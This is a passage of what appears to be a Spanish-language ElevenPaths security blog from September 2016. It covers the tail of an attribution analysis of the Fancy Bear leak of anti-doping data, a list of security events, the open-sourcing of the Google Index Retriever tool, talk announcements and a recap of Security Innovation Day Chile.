Por último, una de las imágenes de fancybear.net es 0_125b8b_3cb8177e_M.png con hash MD5 a20350dc2e412a9c351d83571ecc3251. La única referencia que se ha podido identificar en internet a una imagen con ese nombre se encuentra en el sitio de habla rusa kira-scrap.ru.

Valoración
Diversos medios de comunicación y la propia Agencia Mundial Antidopaje han manifestado que los presuntos responsables procederían de Rusia y estarían vinculados al grupo hacktivista Fancy Bear. Se han identificado evidencias que respaldan esta hipótesis como la publicación de los contenidos en una zona horaria de al menos UTC+3 y la referencia a una fotografía solamente encontrada en un dominio de origen ruso. Sin embargo, la información obtenida en esta investigación es en algunos momentos contradictoria, por lo que tampoco se puede descartar por completo que se trate de un ataque de falsa bandera en el que la información fuera intencionadamente expuesta para hacer creer que el ataque procede de Rusia. En tal supuesto, se desconocen los posibles actores así como sus motivos para llevar a cabo estas acciones.


Eventos en septiembre y octubre sobre Ciberseguridad


El mes de septiembre y octubre llega cargado de eventos, cursos y charlas sobre seguridad informática. Aquí tienes la lista de actividades en las que participamos. Si coincide alguno de ellos en tu ciudad, acércate a conocernos. ¡Toma nota!

Qurtuba Security Congress
Los próximos 16 y 17 de septiembre en Córdoba se realizará una nueva edición de Qurtuba Security Congress, un evento que te interesará si quieres aprender técnicas de hacking, estar al día en las últimas amenazas tecnológicas en la red e incluso resolver retos CTF. Nuestro compañero Pablo González participará en la sección de Networking Labs con "Pokemon Red vs Blue: Can you catch the red team?"



Próximos ElevenPaths Talks
Desde el mes de julio estamos realizando la Season 2 de los ElevenPaths Talks, la serie de webinars online gratuitos con los que podéis aprender, comentar y debatir cada semana sobre diversos temas relacionados con el hacking y la ciberseguridad.
- 15 de Septiembre: Inseguridad en dispositivos Android
- 22 de Septiembre: Estructura de un CSIRT (II)
- 29 de Septiembre: BIO Hacking

Apúntate a las nuevas charlas de forma gratuita en nuestra web: talks.elevenpaths.com
Síguenos en Twitter y entérate de todas las novedades de #11PathsTalks: twitter.com/elevenpaths
Más info: www.elevenpaths.com



Hackaton Join Innovation
Resérvate el 29 y 30 de septiembre. Desarrolla una app Android para mejorar el mundo. Deja volar tu imaginación y participa en el Hackathon de Join. Regístrate aquí www.joinnovation.com.

Navaja Negra 
Del 29 de septiembre al 1 de octubre en Albacete tiene lugar Navaja Negra, un congreso de seguridad informática para 600 participantes, en el que se realizan ponencias, talleres, demostraciones y más actividades relacionadas con el mundo de la seguridad y la tecnología. Esta nueva edición incluirá la charla "Hacking devices around world: Playing ‘Gallinita Ciega’" de Pablo González y Rafa Sánchez.  Y el taller "HSTS & HPKP: Los Batman y Robin de la seguridad web" de Carmen Torrano y Pablo González.




KeepCoding Connect: Devs+Startups+Community
El próximo sábado 1 de octubre en Madrid llega la cita anual del Desarrollo,  KeepCoding Connect: Devs+Startups+Community. ¿Te interesa conectar con desarrolladores de primera línea? ¿Buscas equipo para tu empresa o proyecto? ¿Quieres contacto directo con reclutadores? Éste es tu evento. No te pierdas el Keynote de cierre Hack Your Life! de Chema Alonso.




Security Innovation Day 2016 
ElevenPaths convocamos la cuarta edición de Security Innovation Day, el evento del año sobre innovación en Ciberseguridad con ponentes de referencia y una buena pizca de innovación. Este año contamos con la participación de un invitado estrella, Hugh Thompson, CTO en Symantec. Para los que no podáis asistir, próximamente estará disponible la inscripción al streaming de Security Innovation Day 2016.  Te esperamos el 6 de octubre a las 15:00 horas en el Auditorio de Telefónica, Madrid. ¡Regístrate!

Conoce todos los detalles del evento en: securityinnovationday.elevenpaths.com



ElevenPaths y la Universidad Carlos III participarán en ACM CCS 2016
ACM Conference on Computer and Communications Security se celebrará del 24 al 28 de octubre en Viena. Es una conferencia que reúne a investigadores, desarrolladores y usuarios de todo el mundo que pretenden compartir ideas y resultados innovadores, proporcionando un entorno en el que discutir y debatir la seguridad a nivel académico. Una investigación promovida desde el área de innovación y laboratorio de ElevenPaths, y desarrollada en conjunto con la Universidad Carlos III de Madrid, será presentada durante la prestigiosa conferencia.

Más info: blog.elevenpaths.com



Si quieres estar al día de todos los eventos sobre ciberseguridad, hacking, innovación y desarrollo, en los que ElevenPaths participa, puedes visitar nuestra sección de Eventos en la web, donde cada semana actualizamos los próximos eventos en los que nuestros expertos participan con ponencias, charlas, talleres, etc.

*También te puede interesar: 

Google Index Retriever es ahora de código abierto

miércoles, 14 de septiembre de 2016

En marzo de 2015, se presentó Google Index Retriever. Ahora ha sido mejorado y corregido y se ofrece a la comunidad para que cualquiera lo mejore o simplemente pueda curiosear en su código. Si cualquier programador necesita una funcionalidad concreta, o se le ocurre cómo pulir algún algoritmo interno, ahora es posible desde GitHub. Esperamos que esto haga de Google Index Retriever una herramienta más eficiente, eficaz y con muchas más y mejores funcionalidades.

Google Index Retriever intentará recuperar el índice de Google, para poder obtener parte del texto de la web y así el contenido eliminado que se necesita. La caché de Google no está ahí para siempre. Archive.org y su WayBackMachine no toma tantas instantáneas de las páginas menos populares, así que se dan situaciones donde lo único que queda de una página está en el índice de Google, y de ahí todavía se puede extraer información.

¿Qué es Index Retriever?

El índice de Google es esa pequeña porción de texto en la página de resultados del motor de búsqueda de Google que se muestra cuando se busca cualquier texto. Es el índice, las palabras buscadas aparecen resaltadas. Google Index es la última parte de una web en desaparecer. Habrá situaciones donde será la única y última parte que queda. Google mantiene índices diferentes para la misma página así que, si se pudieran poner todos juntos, el texto podría reconstruirse y tener la mayor parte de la página eliminada.

Pero no es la única situación en la que la herramienta podría ser útil. ¿Y si el índice contiene contraseñas, números de tarjeta de crédito o cualquier otra información sensible? De hecho esto fue una de las razones para crear la herramienta: demostrar que eliminar páginas con contenido sensible u ofensivo, incluso de la caché, no es suficiente. El contenido podría seguir siendo accesible. Todo esto se explica en esta presentación.

¿Cómo funciona la herramienta?

Es muy sencilla. La herramienta se alimenta de una búsqueda de Google que produce un índice como resultado. Intentará realizar una especie de fuerza bruta en la búsqueda (estimulándola) para obtener de vuelta tanto texto como sea posible.

Ejemplo de uso y recopilación del índice

  • El botón "One Shot": Busca solo una vez con la información proporcionada. Se utiliza para ser lo más específico posible con la cadena de búsqueda antes de empezar con el botón de "Start". 
  • El botón "Start": Comienza buscando en modo automático. La caja de resultados mostrará el tiempo pasado desde que comenzó la búsqueda, la búsqueda que hizo aparecer la información y finalmente la frase más larga encontrada si difiere de la anterior, para que el usuario pueda reconstruir así la página.
La lógica para intentar "estimular" el índice y recuperar la información es:
  • Primero, intenta estimular el índice con las palabras que ya ha encontrado en el resultado del primer índice y se encuentran "alrededor" de la primera palabra buscada, para poder recuperar frases enteras una y otra vez.
  • Si no hay más resultados o no quedan "palabras alrededor", la búsqueda se repite con palabras clave proporcionadas por el usuario como un "ataque por diccionario". Cuando ocurre esto, la barra de progreso cambia de color.
Pestaña de spam

La herramienta también puede ser usada para comprobar si una página ha sido probablemente comprometida y se le han inyectado spam como estrategia de Black SEO. Es habitual que los atacantes comprometan páginas e inyecten palabras relacionadas con el spam en ellas para "robar" su pagerank.

Pestaña de Spam inyectado en una web con Google Index Retriever

Este contenido no es visible por los visitantes sino por los crawlers y robots de Google, así que normalmente se verá en ese índice. Esta pestaña del programa funciona exactamente igual que la otra pero con otra lógica:

  • Intenta buscar directamente desde un conjunto diferente de keywords (relacionados con el Spam) en el índice de Google. De esta forma, es más sencillo saber si una página ha sido comprometida y se le ha inyectado spam relacionado con el Black SEO.

Otras funcionalidades

Ell programa está escrito en Java para que pueda funcionar bajo cualquier sistema y versión, aunque ha sido más comprobada en Windows. Los resultados pueden ser exportados a un documento html en local. Las keywords son completamente personalizables. Pueden ser añadidas individualmente o editadas directamente desde un fichero TXT.

Añadiendo keywords al diccionario para estimular el índice

Esperamos que la herramienta sea útil y ahora su código, también.

ElevenPaths Talks: Inseguridad en dispositivos móviles Android

martes, 13 de septiembre de 2016




El próximo jueves 15 de septiembre nuestro compañero Gabriel Bergel impartirá una charla sobre Inseguridad en dispositivos móviles Android en la que explicará la arquitectura de Android para conocer y comprender mejor cómo tener cuidado si eres usuario técnico de esta tecnología, y qué consideraciones deberías tener si eres un desarrollador de apps.

La duración de la charla de Gabriel será de unos 30 minutos, divididos entre 20 y 25 minutos de exposición y de 5 a 10 minutos de preguntas y respuestas. El horario de la charla serán las 15.30  (hora España). La charla estará disponible al termina ésta en nuestro canal de YouTube. La ponencia se llevará a cabo por Hangout. La sesión se impartirá en castellano.

Si quieres saber más acerca del tema, no dudes en pasarte por nuestra Community, dónde nuestros compañeros hablan sobre éste y otros temas de interés en el mundo de la Seguridad. Puedes mirar el calendario de talks para ver las que aún quedan por celebrarse. Recuerda, tienes una cita el próximo 15 de septiembreen horario de 15.30 (hora España). Para registrarte debes usar el siguiente formulario de ElevenPaths Talks.

Más información en:
talks.elevenpaths.com

SAVE THE DATE: Security Innovation Day 2016

lunes, 12 de septiembre de 2016





Security Innovation Day is the setting where every year Telefónica and ElevenPaths unveil their latest launches and novelties in innovation and security. The event has become an international benchmark event in the cybersecurity sector in which we count on reference speakers and a very special guest:  Hugh Thompson, Chief Technology Officer in Symantec.

Come join us in the fourth edition of our Security Innovation Day. We look forward to seeing you on October 6 at the Telefónica Auditórium (Madrid), situated in the Central Building of the Distrito Telefónica.

"Let Security Be_" is our claim of the fourth Security Innovation Day 2016
Only those who really understand the issues surrounding cybersecurity delegate it to the experts. Our real challenge is to offer security solutions that keep you one step ahead of all the different kinds of attacks in the cybercrime industry. That's why we are so firmly committed to innovation and forming alliances with the major players in the market. It's the road to a more secure future.

These are the topics selected for the fourth edition of this event. We hope that they will be of your interest.

Agenda

3:00 p.m. Guest list

3:30 p.m. Welcome

• Solutions vs. Cybercrime
• Strength Lies in Unity
• Innovation: The Road To a More Secure Future
• Cyber-attacks in the Digital Age
• Four Eyes See More Than Two
• Special guest: Hugh Thompson

7:00 p.m. Cocktails

For more details see agenda: securityinnovationday.elevenpaths.com

The seating is limited, we suggest you to register as soon as possible.
Sign up now!

Besides, this year it's our anniversary! We are three years old and we want to celebrate it with you. To mark the event, we have prepared a very special party. Will you join us?

*Related content:
Telefónica and ElevenPaths announce new market leading security offering following key sector agreements

SAVE THE DATE: Security Innovation Day 2016




Security Innovation Day es el escenario desde el que cada año Telefónica y ElevenPaths compartimos de primera mano contigo nuestros últimos lanzamientos y novedades en innovación y seguridad. Un evento de referencia en el sector de la Ciberseguridad, en el que contaremos con la participación de ponentes de referencia, y un invitado muy especial: Hugh Thompson, Chief Technology Officer en Symantec.

Acompáñanos en esta cuarta edición de nuestro Security Innovation Day. Te esperamos el 6 de octubre a las 15:00 horas en el Auditorio de Telefónica, Madrid, localizado en el Edificio Central de Distrito Telefónica.

"Let Security Be_" es el lema de la cuarta edición de Security Innovation Day.
Sólo los que están realmente concienciados con la Ciberseguridad la delegan en manos expertas. Nuestro verdadero reto es ofrecer soluciones de seguridad que permitan estar siempre un paso por delante de todo tipo de ataques del cibercrimen. Por eso, apostamos por la innovación y las alianzas con los grandes players del mercado, como camino hacia un futuro más seguro.

Estos son los temas seleccionados para esta 4ª edición. Esperamos que os resulten de interés.

Agenda

15:00: Acreditación

15:30: Bienvenida

• Soluciones vs Cibercrimen
• La unión hace la fuerza
• La innovación: el camino hacia un futuro más seguro
• Los ciberataques en la era digital
• Cuatro ojos ven más que dos
• Invitado especial: Hugh Thompson.

19:00: Cóctel

Consulta el detalle de la agenda en: securityinnovationday.elevenpaths.com

El aforo es limitado, te recomendamos que te registres lo antes posible.

¡Regístrate ahora!

Además, este año ¡estamos de aniversario! Cumplimos tres años y queremos celebrarlo contigo. Para celebrarlo hemos preparado una fiesta muy especial. ¿Nos acompañas?

*También te puede interesar:

Así fue el primer Security Innovation Day Chile

viernes, 9 de septiembre de 2016

Hace 4 meses aproximadamente nació la loca idea de organizar el Security Innovation Day (SID) en Chile, para los que no lo saben el SID es un evento que ElevenPaths  realiza desde el 2014 en Octubre en España, esta temporada podría ser considerada como Q1 porque es post vacaciones de verano, momento en el cual se ha pretendido a través de la conferencia contar lo pasado en un año en la compañía, y lo que viene para futuro (roadmap); el maestro de ceremonia siempre es Chema Alonso (CDO de Telefónica) y la agenda de la conferencia la componen principalmente colegas  de ElevenPaths y Telefónica que presentan las novedades en cuanto a herramientas y desarrollos de seguridad que estamos realizando y también nos han acompañado algunos ejecutivos de compañías colaboradoras como Nir Zuk fundador y CTO de Palo Alto en la versión del año pasado. El objetivo que teníamos en Chile, era similar al de España, pero no nos encontrábamos en la misma etapa como oficina local de Telefónica, por lo cual quisimos hacer una conferencia donde pudiéramos informar acerca de la historia de ElevenPaths, quiénes somos, a qué nos dedicamos, los productos que hemos desarrollado, las novedades que hemos liberado y el futuro que hemos definido para cada uno, también conversar sobre las alianzas que hemos logrado con otras compañías líderes del mercado, lo que nos ha permitido integrar nuestros productos en soluciones de nicho, y siempre con Demos en vivo que es lo que lo hace más práctico y entretenido.

Joaquín Ramos fue el maestro de ceremonias de SID Chile

Finalmente llegó el día 09 de agosto y lo que partió como idea loca se hizo realidad, logramos tener 200 asistentes, lo que nos dejó muy contentos y con la tranquilidad de haber logrado el objetivo, partimos un poco atrasados, como es normal en Sudamérica, con la introducción de Pedro Pablo Lazo, Director de Telefónica Empresas, que nos contó quién es Telefónica, por qué sabe de Seguridad de la Información, y cuál ha sido el avance y logros en este ámbito, luego fue el turno de Luis Urzúa Gerente de Soluciones Digitales, quien nos habló de Innovación y por qué la Seguridad necesita innovación para enfrentar los desafíos actuales y cómo Telefónica puede ayudar en los requerimientos actuales que presentan los clientes.
El tercer turno antes del coffee break me tocó presentar a mí, y traté de en media hora contar la historia de ElevenPaths, las alianzas que hemos formado, integraciones, así como, las principales ventajas y estado del arte de los productos Cyberthreats (Vigilancia Digital); Latch que es nuestro path 1 y producto regalón, que es un pestillo digital que sirve para proteger tu identidad digital; la suite de Metashield que son nuestras soluciones para identificar y eliminar la metadata; y Faast que es nuestra plataforma para descubrir el shadow IT y hacer pentest persistente a todas las plataformas conectadas a Internet. Fue un reto casi imposible poder hablar de todo lo anterior en 30 minutos, y creo que lo logré con Joaquín Ramos (maestro de ceremonia) apurándome cada 10 minutos. Luego fue el esperado café y sirvió para tener los primeros feedbacks del evento, y fue muy reconfortante escuchar que el público estaba muy contento con las charlas.

Al volver tuvimos oportunidad de ver la charla de Luis del Árbol (@luisdelarbol) Product Manager de ElevenPaths, que nos habló de IoT y cómo a través de dos de nuestras soluciones podíamos autenticar una acción en IoT; y cómo Faast puede ayudar a las empresas a descubrir el Shadow IoT y descubrir vulnerabilidades en este ámbito. Para demostrarlo qué mejor que una demostración en vivo con una máquina de caramelos con wifi que entregaba caramelos solo si se autenticaba la firma (mediante SealSign) de la persona que activa la máquina para recoger caramelos.

Luis del Árbol Product Manager de ElevenPaths

Posterior a Luis fue el turno del CISO de Terra y CSA de ElevenPaths Brasil Leandro Bennaton (@bennaton), que nos habló del interesante mundo del Big Data y el desafío que representa en la actualidad para las empresas, y cómo a través de un proyecto/plataforma desarrollada en Telefónica llamada Sinfonier podemos hacer análisis de inteligencia de distintas fuentes públicas, aplicar filtros, operaciones lógicas y entregar esta información en algún contenedor para ser analizada, una de las frases que recuerdo de esta presentación y nos representa a todos fue: “una de las cosas que más me gusta de trabajar en ElevenPaths es que desarrollamos tecnologías abiertas y gratis para la comunidad”.

 Leandro Bennaton CSA de ElevenPaths Brasil

Para finalizar el evento habló Marcelo Rey de Sonic Wall que nos introdujo en el apasionante mundo de las ciudades inteligentes y cómo estos avances mejoran nuestra vida, la hacen más rápida, eficiente, pero a la vez más expuesta, ya que, dependemos de muchas tecnologías de distinta índole que tienen debilidades.

Marcelo Rey de Sonic Wall

Fue un gran desafío concretar esta primera versión del SID Chile 2016, mucho trabajo, estrés, discusiones, risas, etc. Pero estoy seguro que dimos un gran paso como compañía para posicionarnos en el ámbito de la seguridad de la información y hemos creado un hito en la comunidad de profesionales y estudiantes locales (lo hemos podido validar con el pasar de los días porque solo hemos recibido felicitaciones), pero con un gran éxito viene una gran responsabilidad y esperamos que el próximo año realizemos una conferencia mejor que la de este año, muy contento me despido y los dejo invitados para el SID 2017, abrazos.

Gabriel Bergel
CSA - Chief Security Ambassador
+56 9 9227 4094
@gbergel
gabriel.bergel@global.11paths.com